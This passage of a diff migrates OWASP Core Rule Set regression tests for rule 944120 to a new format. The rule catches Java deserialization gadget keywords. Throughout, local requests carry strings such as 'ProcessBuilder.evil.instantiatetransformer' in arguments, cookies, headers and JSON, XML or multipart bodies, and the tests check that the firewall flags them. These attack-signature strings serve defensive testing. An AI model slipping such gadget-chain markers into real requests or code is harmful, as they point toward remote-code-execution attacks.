Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.forclosure\"}" + output: + log: + expect_ids: [944120] + - test_id: 30 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.forclosure\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.forclosure\": \"test\"}" + output: + log: + expect_ids: [944120] + - test_id: 31 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: 
application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.forclosure": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-32 + {"ProcessBuilder.evil.forclosure": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 32 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + 
uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.forclosure": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-33 + {"ProcessBuilder.evil.forclosure": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 33 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.forclosure - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-34 + ProcessBuilder.evil.forclosure + -----------------------------thisissparta-- + output: + log: + 
expect_ids: [944120] + - test_id: 34 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.forclosure - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-35 + ProcessBuilder.evil.forclosure + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 35 desc: "Argument test includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatefactory" + output: + log: + expect_ids: [944120] + - test_id: 36 desc: "Argument name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatefactory=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory=test" + output: + log: + expect_ids: [944120] + - test_id: 37 desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - 
headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.instantiatefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-38 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.instantiatefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 38 desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.instantiatefactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.instantiatefactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 39 desc: "Request header test includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.instantiatefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.instantiatefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 40 desc: "XML element includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-41 + - input: + dest_addr: "127.0.0.1" + port: 80 
+ headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 41 desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944120] + - test_id: 42 desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: 
"id \"944120\"" - - test_title: 944120-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 43 desc: "XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-44 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory" + output: + log: + expect_ids: [944120] + - test_id: 44 desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-45 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory" + output: + log: + expect_ids: [944120] + - test_id: 45 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-46 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatefactory" + output: + log: + expect_ids: [944120] + - test_id: 46 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.instantiatefactory\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-47 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.instantiatefactory\"}" + output: + log: + expect_ids: [944120] + - test_id: 47 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.instantiatefactory\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-48 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: 
"{\"ProcessBuilder.evil.instantiatefactory\": \"test\"}" + output: + log: + expect_ids: [944120] + - test_id: 48 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.instantiatefactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-49 + {"ProcessBuilder.evil.instantiatefactory": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 49 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.instantiatefactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-50 + {"ProcessBuilder.evil.instantiatefactory": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 50 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: 
form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.instantiatefactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-51 + ProcessBuilder.evil.instantiatefactory + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 51 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; 
boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.instantiatefactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-52 + ProcessBuilder.evil.instantiatefactory + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 52 desc: "Argument test includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-53 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatetransformer" + output: + log: + expect_ids: [944120] + - test_id: 53 desc: "Argument name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatetransformer=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-54 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer=test" + output: + log: + expect_ids: [944120] + - test_id: 54 desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.instantiatetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-55 + - input: + dest_addr: "127.0.0.1" + 